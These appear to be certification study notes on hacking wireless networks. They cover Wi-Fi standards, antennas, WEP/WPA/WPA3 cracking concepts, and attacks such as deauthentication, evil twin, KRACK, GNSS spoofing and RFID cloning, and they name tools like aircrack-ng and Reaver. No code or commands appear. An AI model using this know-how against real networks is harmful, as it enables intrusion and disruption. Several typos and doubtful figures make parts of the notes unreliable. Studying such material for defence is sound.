M16 Hacking Wireless Networks
Ad-Hoc Connection Attack
- Ad-Hoc Mode (like airdrop) o Allows clients to communicate with each other directly WITHOUT an AP o Allows data to be conveniently shared o Does NOT provide strong authentication or encryption - Attacker connects to client operating in Ad-Hoc Mode
Frequency-hopping spread spectrum (FHSS)
- AKA Frequency-hopping code-division multiple access (FH-CDMA) - Transmitting radio signals by rapidly switching a carrier among many frequency channels - It decreases the efficiency of unauthorized interception or jamming of telecommunications - A transmitter hops between available frequencies using a specified algorithm in a pseudorandom sequence known to both the sender and receiver
(4) Launch of Wireless Attacks
Aircrack-ng Suite
WPA3 Cracking Techniques
Downgrade Security Attacks - Downgrade the AP to WPA2 - 2 Ways to Downgrade o Exploiting Backward Compatibility o Exploiting the Dragonfly handshake Side-Channel Attacks § Timing-based attack § Cache-based attack
802.11d
Enhancement to a and b Enables global portability = allows variations in frequencies, power levels and bandwidth
Brute forcing of WPA keys
- Perform a brute-force attack on WPA encryption keys using a dictionary or using tools such as aircrack, aireplay, or KisMAC - May take hours, days, or even weeks
iCopy-X
- Portable RFID cloning device - Entirely stand-alone device with an integrated screen and buttons = does NOT need external computer
Reflector Antennas
- Reflect radio signals and has a high manufacturing cost - Concentrates EM energy that is radiated or received at a focal point - Generally parabolic
Jamming Signal Attack
- Send overwhelming volumes of malicious traffic = DoS - Use hardware to perform attack o Generates signals that appear to be noise to the devices on network o Causes them to hold their transmissions until the signal has subsided
Honeypot/Honeypot AP Attack
- Setting up an unauthorized wireless network using a rogue AP + impersonate - Has high-power (high-gain) antennas - Uses the same SSID as the target network - They transmit a stronger beacon signal than legitimate APs
Authentication Attacks
- Steal the identity of Wi-Fi clients, their personal information, login credentials, etc. - To gain unauthorized access to network resources
Parabolic Grid Antenna
- Uses the same principle as a satellite dish but NO solid dish - Consists of a semi-dish in the form of a grid consisting of aluminum wires - Can achieve very-long-distance Wi-Fi transmissions through highly focused radio beams - Useful for transmitting weak radio signals over very long distances (10 miles) - Can receive Wi-Fi signals that are either horizontally or vertically polarized
Sniffing Tools
- Wireshark with Npcap - SteelCentral Packet Analyzer - OmniPeek Network Protocol Analyzer - CommView for Wi-Fi - Kismet
De-authentication Attack
- attacker floods station(s) with forged de-authenticates or disassociates to disconnect users from an AP
Global System for Mobile Communications (GSM)
- universal system used for mobile data transmission in wireless networks worldwide
802.11a
3.7 GHz and 5 GHz OFDM 6, 9, 12, 18, 24, 36, 48, 54 Mbps speeds 35-100 and 5000 M
WPA2
802.1X/EAP/PSK AES = Encryption algorithm CCMP = Encryption method 128, 192, 256 bits = Key size CBC-MAC = Data integrity 48 bits = IV length
WPA3
802.1X/EAP/PSK AES = Encryption algorithm CCMP = Encryption method 128/192 bits = Key size (personal/enterprise) BIP-GMAC-256 = Data integrity 48 bits = IV length
WPA
802.1X/EAP/PSK RC4 = Encryption algorithm TKIP = Encryption method 128 bits = Key size MIC and CRC-32 = Data integrity 48 bits = IV length
WarDriving
o Attackers drive around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks. § Send probe requests or listens for beacons - Drive the car at speeds of 35 mph or below (at higher speeds, the Wi-Fi antenna will not be able to detect Wi-Fi networks).
WarFlying
o Attackers use drones to detect open wireless networks.
Wormhole Attack
- Exploits dynamic routing protocols such as Dynamic Source Routing (DSR) and the Ad-Hoc On-Demand Distance Vector (AODV) - Attacker places themselves in the target network to sniff wireless transmissions - From this location, the attacker advertises that the malicious node has the shortest route for transmitting data - Attacker creates a tunnel to forward the data between the source and destination node - Impacting the confidentiality, integrity, and availability of network data
Key Reinstallation Attack (KRACK)
- Exploits flaws in the implementation of the four-way handshake in the WPA2 - Four-way handshake o Establish connections o Generate a fresh encryption key that will be used to encrypt the network traffic - Forcing Nonce reuse o Attacker tricks user into using already in use key o Attacker captures the victim's ANonce key that is already in use to manipulate and replay cryptographic handshake messages
Inter-Chip Privilege Escalation/Wireless Co-Existence Attack
- Exploits vulnerabilities in wireless chips - Comb Chip = designed for Bluetooth AND Wi-Fi - Attackers leverage combo chips to exploit one chip to steal the data from another chip - Bluetooth chip can capture sensitive data from the Wi-Fi chip o OR can manipulated data going through the Wi-Fi Chip
Misconfigured AP Attack
- Exposes network to attack - Difficult to detect a misconfigured AP because it is an authorized, legitimate device - SSID broadcast, Weak PW, Config errors (default configs)
(1) Wi-Fi Discovery
- Find a Wi-Fi network or device - Sing tools such as insider and NetSurveyor - Footprinting the wireless networks and finding the appropriate target
De-authentication attack
- Find an actively connected client - Attacker forces the client to disconnect from the AP - Use aireplay to capture the authentication packet when the client attempts to reconnect o Includes the pairwise master key (PMK), which the attacker can crack by dictionary or brute-force attacks
Wi-Jacking Attack
- Force user to visit malicious site by creating evil twin using KARMA o The client device's browser must store the admin interface credentials of the router. The target network's router must use an unencrypted HTTP
aLTEr Attack
- Force victim to visit malicious website using DNS spoofing - Performed on LET data in AES counter (AES-CTR mode) = NO integrity protection - Attacker installs a virtual (fake) tower between two authentic endpoints - uses this virtual tower to interrupt the data transmission between the user and real tower - Use virtual fake tower to hijack the active LTE session - Redirects the victim to malicious websites - Take control over browsing data and modifies user inputs with a spoofed DNS server
WEP Encryption Cracking
- Gathering a large number of IVs - Done by listening to traffic - WEP packet injection o Expedites the IV-gathering process and allows capturing a large number of IVs in a short period
GNSS Spoofing
- Global Navigation Satellite System (GNSS) - Attacker modifies the target GNSS signal measurements (position, navigation, and time = PNT) - Broadcasts the same signals to the target's GNSS receiver - User's GNSS receiver believes it to be authentic - Force system to display false positions and times
Rogue AP Attack
- Installed in the network = allows unauthorized users to connect to that network - Unauthorized (or rogue) APs can allow anyone with an 802.11-equipped device to connect to a corporate network - The attacker lures the user to connect to the rogue AP by sending the SSID - If the user connects to the rogue AP under the impression that it is a legitimate AP, all the traffic from the user passes through the rogue AP - Allows attacker to sniff traffic flowing through rough AP
Confidentiality Attack
- Intercept confidential info - An attacker may attempt to break the encryption
Tools to discover Wi-Fi networks
- Laptop with a Wi-Fi card - External Wi-Fi antenna - Network discovery software - inSSIDer - NetSurveyor - Wi-Fi Scanner - Acrylic Wi-Fi Home - Wi-Fi Scanner - Acrylic Wi-Fi Home - WirelessMon - Ekahau Wi-Fi Heatmaps
Manipulation (MITM)
- Level beyond eavesdropping - Attacker receives the victim's encrypted data, manipulates it, and retransmits the manipulated data to the victim - Attacker can intercept packets with encrypted data and change the destination address to forward packets across the Internet
Availability Attacks
- Makes wireless network services unavailable to legitimate users - Obstructing the delivery of wireless services - By crippling WLAN resources or by denying them access
(2) GPS Mapping
- Map the network - Drawing a map of the network
GPS Mapping Tools
- Maptitude Mapping Software - Skyhook - ExpertGPS - GPS Visualizer - Mapwel - TrackMaker
Orthogonal frequency-division multiplexing (OFDM)
- Method of digital modulation of data - A signal is split into multiple carrier frequencies that are orthogonal (occurring at right angles) to each other
Service set identifier (SSID)
- NAME of network = A 32-alphanumeric-character unique identifier given to a wireless local area network (WLAN)
Client Mis-Association - User connect to someone else
- Network client mistakenly connects to a neighboring AP
Configuration error (Misconfigured AP Attack)
- No PW configured - Errors made during installation - Configuration policies on an AP - Human errors made while troubleshooting WLAN problems - Security changes not implemented uniformly across an architecture - SSID broadcasting is a configuration error that assists attackers in stealing an SSID = makes the AP assume that the attacker is attempting a legitimate connection
WPA Cracking Techniques
- Only way to crack WPA is to sniff the PW PMK associated with the handshake auth process
Automated Spectrum Analysis Tools
- RF Explorer
Additional RFID cloning tools:
- RFIDler - RFID Mifare Cloner - Proxmark3 - Boscloner Pro
Omnidirectional Antenna
- Radiate electromagnetic (EM) energy in all directions - Provides a 360° horizontal radiation pattern - Radiates strong waves uniformly in two dimensions, but the waves are usually not as strong in the third dimension - Efficient in areas where wireless stations use time-division multiple access technology - Good for radio towers and receivers may be moving
WPA3 Encryption Cracking
- Replaces WPA2's four-way (PSK) handshake with the Dragonfly (SAE) handshake - Dragonfly SAE still vulnerable to password-cracking - Dragonblood o Set of vulnerabilities in WPA3 allowing key recover, security mechanism downgrades, info-theft - Tools = Dragonslayer, Dragonforce, Dragondrain, and Dragontime
Dipole Antenna (doublet)
- Straight electrical conductor measuring half a wavelength from end to end - Connected at the center of the radio frequency (RF) feed line - Feeds on a balanced parallel-wire RF transmission line
MAC Spoofing Tools
- Technitium MAC Address Changer - Allows a user to change (spoof) the MAC address of their NIC instantly - Has user interface and provides info on each NIC in the machine
Wireless ARP Poisoning Attack
- The ARP cache maintained by the OS is corrupted with wrong MAC addresses - Send an ARP replay packet constructed with a wrong MAC address - Impacts all the hosts in a subnet o All hosts connected to a switch or hub are susceptible to ARP poisoning attacks - Attackers IP is associated with the victim's MAC - Use Ettercap for ARP attacks
Basic service set identifier (BSSID)
- The MAC address of an access point (AP) or base station that has set up a basic service set (BSS)
Fragmentation Attack
- The aircrack-ng suite helps the attacker obtain a small amount of keying material from the packet - aircracking-ng sends a packet to the AP that the AP echoes = capture keying info
Choosing the Optimal Wi-Fi Card
- Tools such as aircrack-ng and KisMAC work only with selected wireless chipsets - Consider the following when choosing card o Determine the Wi-Fi requirements o Learn the capabilities of a wireless card o Determine the chipset of the Wi-Fi card o Verify the chipset capabilities o Determine the drivers and patches required
802.16 (WiMAX)
2 - 11 GHz SOFDMA 34 - 1000 Mbps speeds 1609.34 - M 9656.06 (1-6 miles)
Multiple input, multiple output-orthogonal frequency-division multiplexing (MIMO-OFDM)
- AKA transmission scheme or modulation scheme - Spread spectrum technique that multiplies the original data signal with a pseudo-random noise-spreading code - Protects signals against interference or jamming
Evil Twin
- AP that pretends to be a legitimate AP by imitating its SSID - Sets up a rogue AP outside the network perimeter - Lures users to sign into this AP - Uses tools: KARMA
Rouge AP
- APs an attacker installs on a network without authorization - NOT under the management of the admin o NOT configured for security - Provide backdoor access to the wireless network - Use MANA Toolkit
Tools
- Aircrack-ng - Wifiphisher - Reaver
Eavesdropping (MITM)
- An attacker in the vicinity of a wireless network can receive radio waves on the wireless network without much effort or equipment - Attacker can examine the entire data frame and store it
(3) Wireless Traffic Analysis
- Analyze the traffic - ID the vulnerabilities and susceptible victims
Sinkhole Attacka
- Attacker advertises a compromised or malicious node as the shortest possible route - Attacker places the malicious node near the base station and attracts all the neighboring nodes with fake routing path info - Sniff and manipulate data
AP MAC Spoofing
- Attacker can spoof the MAC address of the AP by programming a rogue AP to advertise the same identity information as that of the legitimate AP = bypasses MAC filtering on PA - Attack spoofs their MAC to look like authorized client --> connects to AP
Man-in-the-Middle Attack (MITM)
- Attacker intercept, read, or alter info transmitted between 2 computers
Disassociation Attack
- Attacker makes the victim unavailable to other wireless devices by destroying the connectivity between the AP and client
GPS
- Attacker uses this GPS utility to locate and map the target wireless network in a geographical area
Meaconing Method (GNSS)
- Attackers aim to block and re-broadcast the original signals to the receiver - Effective with mono-and multi-antenna meaconers that control multiple satellites - Allows attackers to manipulate the original signal with false positioning data
Interrupting the Lock Mechanism (GNSS)
- Attackers aim to discover a GNSS receiver's new lock via a faulty signal - Start radiating a jamming signal inside the GNSS receiver, where the receiver requests for the next acquisition - A signal simulator is used to generate a false signal, transmit it to the GNSS receiver, and gain the new lock data of the receiver - Gain location data of receiver by generating a false signal to the receiver
MAC Spoofing Attack
- Attackers change their MAC address to that of an authenticated user to bypass the MAC filtering configured in an AP - To spoof a MAC address, the attacker simply needs to set the value returned by ifconfig to another hex value in the format of aa:bb:cc:dd:ee:ff
Drag-off Strategy (GNSS)
- Attackers track the receiver's position and identify the deviation from the original location to a fake one - Attacker mirrors the original navigation signals, injecting a progressive misalignment between those signals, and forwarding them to the GNSS receiver. - Protects attackers from detection by radar systems
Cancellation Methodology (GNSS)
- Attackers use dual signal transmission to cancel out individual spoofed signals by introducing false satellite data. - Used for extracting the code phase data but limited in terms of obtaining the amplitude matching and carrier phase
Directional Antenna
- Broadcast and receive radio waves from a single direction - Works effectively in only a few directions = reduces interference
WPA/WPA2 Encryption Cracking
- Can still be cracked if right packets are captured
Offline attack
- Capture the WPA/WPA2 authentication handshake - Crack encryption key offline - Capturing a full authentication handshake from a client and the AP helps in breaking the WPA/WPA2 encryption
RFID Cloning Attack
- Capturing the data from an RFID tag and then creating its clone using a new chip - Data from one RFID tag are copied into another tag by changing the tag ID (TID) - The cloned copy is different from the original RFID tag and may be easily detected - Use iCopy-X, RFIDler, etc. to clone RFID tags
Integrity Attack
- Changing data during transmission - Attackers send forged control, management, or data frames to misdirect wireless devices
(5) Wi-Fi Encryption Cracking
- Crack the WEP or WPA/WPA2 encryption
Denial-of-Service Attack
- Disrupt wireless network connections by broadcasting de-authenticate commands
Yagi Antenna (Yagi-Uda)
- Unidirectional antenna commonly used in communications at a frequency band of 10 MHz to VHF and UHF - High gain and low signal-to-noise (SNR) ratio - Unidirectional radiation and response pattern - Concentrates the radiation and response - Consists of a reflector, dipole, and many directors - Develops an end-fire radiation pattern
WPA PSK
- Uses a user-defined password to initialize the four-way handshake - User provides credentials/PW to the AP - Capture WPA-PSK handshake containing password = brute forced using a dictionary attack
WEP Cracking
- Wesside-ng = WEP cracking tool o Finds and associates with EWP network
Wi-Fi Hotspot Finder Tools
- Wi-Fi Finder - Homedale::Wi-Fi/WLAN Monitor - Fing - Network Tools - WiFi Finder - Free WiFi Map - WiFi Map - Find Wifi & Connect to Wi-Fi
Wireless Hacking Methodology
- Wi-Fi discovery - GPS mapping - Wireless traffic analysis - Launch of wireless attacks - Wi-Fi encryption cracking - Wi-Fi network compromising
Mobile-based Wi-Fi Discovery Tools
- WiFi Analyzer - Opensignal - Network Signal Info Pro - WiFi Manager - Network Refresher: Network Signal Refresher - WiFi Scanner - WiGLE
Denial-of-Service: Disassociation and De-authentication Atta
- Wireless DoS attacks include: o Disassociation attacks o De-authentication attacks
802.15.4 (ZigBee)
0.868, 0.915, 2.4 GHz O-QPSK, GFSK, BPSK 0.02, 0.04, 0.25 Mbps speeds 1 - 100 M
Unauthorized Association - someone lese connects to you
2 Forms o Accidental § Connecting to the target network's AP from a neighboring organization's overlapping network without the victim's knowledge o Malicious § Done using Soft Aps § The attacker infects the victim's machine and activates soft APs allowing an unauthorized connection to the network
802.11b
2.4 GHz DSSS 1, 2, 5.5, 11 Mbps speeds 35 - 140 M
802.11
2.4 GHz DSSS, FHSS 1 Mbps and 2 Mbps speeds 20-100 M
802.15.1 (Bluetooth)
2.4 GHz GFSK, π/4-DPSK, 8DPSK 25 - 50 Mbps speeds 10 - 240 M
802.11g
2.4 GHz OFDM 6, 9, 12, 18, 24, 36, 48, 54 Mbps speeds 38 - 140 M
802.11n
2.4 and 5 GHz MIMO-OFDM 54 - 600 Mbps speeds 70 - 250 M
802.11i
A standard for WLANs that provides improved encryption for networks that use 802.11a, 802.11b, and 802.11g standards; defines WPA2-Enterprise/WPA2-Personal for Wi-Fi
802.11e
It provides guidance for prioritization of data, voice, and video transmissions enabling QoS
WEP
NO authentication RC4 = Encryption algorithm WEP = Encryption method 40 or 104 bits = Key size CRC-32 = Data integrity 24 bits = IV length
Rogue AP vs Evil Twin
Rouge PA disables SSID broadcast + setup INSIDE network Evil Twin copies and broadcasts the SSID of target network + setup OUTSIDE network
Misconfiguration Key Elements (Misconfigured AP Attack)
SSID broadcast - APs using default SSIDs are vulnerable to brute-force dictionary attacks - An unencrypted SSID broadcasts the password in plaintext Weak password - Some network admins incorrectly use SSIDs as basic passwords
WarChalking
Symbols are drawn in public places to advertise open Wi-Fi networks.
KARMA Attack
create an evil twin using KARAM tool
WarWalking
o Attackers walk around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks.
MAC DoS Attacks
o de-authentication flood attacks = everyone de-authenticated o virtual jamming o association flood attacks
